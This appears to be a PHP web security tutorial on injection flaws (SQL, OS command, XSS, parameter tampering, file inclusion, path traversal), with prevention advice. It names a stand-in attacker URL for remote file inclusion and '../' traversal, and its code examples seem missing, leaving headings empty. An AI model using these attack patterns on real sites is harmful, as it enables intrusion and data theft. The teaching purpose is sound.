
Injections are vulnerabilities that allow attackers to inject malicious code or data into an application that causes unwanted or dangerous behavior.
Description: A vulnerability that allows attackers to inject SQL code into database queries.
Example: A web application that uses user input to form SQL queries without proper validation, allowing an attacker to execute arbitrary SQL queries.
Description: A vulnerability that could allow an attacker to inject operating system commands.
Example: An application that executes system commands based on user input, allowing an attacker to execute unwanted commands.
Description: A vulnerability that could allow an attacker to inject malicious JavaScript code into web pages that are then executed in other users’ browsers.
Example: An application that displays user input without proper sanitization, allowing an attacker to inject malicious code.
XSS (Cross-Site Scripting) is a vulnerability that allows an attacker to inject malicious script into a web page that is executed in the victim’s browser. This can lead to the theft of session cookies, changes to the content of the page, or redirecting the user to a malicious site.
An attacker can inject JavaScript code that performs unwanted actions, such as stealing cookies or redirecting the user.
To prevent XSS attacks, ensure input and output sanitization:
Input sanitization: Use htmlspecialchars() to sanitize data received from the user.
Output sanitization: Use functions that automatically escape the output, such as htmlspecialchars() in PHP or autoescaping in the Twig or Blade template engines.
HTTP Only flag: Use the HTTP Only flag for cookies to prevent access to them via JavaScript.
Theft of cookies:
Forgery of page content:
SQL Injection is a vulnerability where an attacker can inject malicious SQL code into database queries, allowing data to be accessed, modified, or deleted.
Dangerous SQL query:
Preventing SQL Injection:
Use prepared statements:
An attacker can inject malicious code into $someString:
HTTP Parameter Injection is a vulnerability that occurs when an attacker modifies HTTP request parameters to gain unauthorized access or change data.
Vulnerable code that allows changing parameters:
File vulnerabilities can occur due to improper processing or validation of files that are uploaded by users or due to vulnerabilities in web servers.
Using require() and include() in PHP:
An attacker can include a malicious file, for example: http://attacker.site/malicious.php.
Weak file validation:
An attacker can use ../ to navigate to unwanted directories.